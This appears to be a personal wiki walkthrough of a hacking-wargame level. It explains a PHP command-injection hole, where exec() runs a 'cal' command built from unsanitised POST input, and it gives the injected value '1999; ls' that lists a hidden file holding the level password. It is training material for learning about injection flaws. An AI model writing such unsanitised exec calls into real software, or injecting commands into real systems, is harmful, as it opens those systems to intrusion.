Basic 7

From Kyle Anderson - Notebook - xKyle.com

Jump to:navigation, search

This mission requires basic knowledge of linux shell commands and operators. The command "ls" lists the contents of a directory, while the semicolon (";") character ends one command without requiring a newline / RET.
You need to end the "cal" command and run ls. The script being run is similar in effect to

echo exec("cal ... ".$_POST['cal']);

With a normal input (a 4 digit number) the code is effectively

echo exec("cal ... 1999");

We want to end the "cal" command and start the "ls" command, so we use a semicolon, making the input "1999; ls" and the code

echo exec("cal ... 1999; ls");

This should output the normal calendar information, and at the bottom there should be something like

.
..
level7.php
cal.pl

index.php
k1kh31b1n55h.php
perl5.8.9.core

Go to /basic/7/TheObscureFileYouJustFound.php . There's your password!

Retrieved from "http://localhost/Basic_7"

Basic 7

From Kyle Anderson - Notebook - xKyle.com

Personal tools

Namespaces

Variants

Views

Actions

Search

Projects

Toolbox

Meta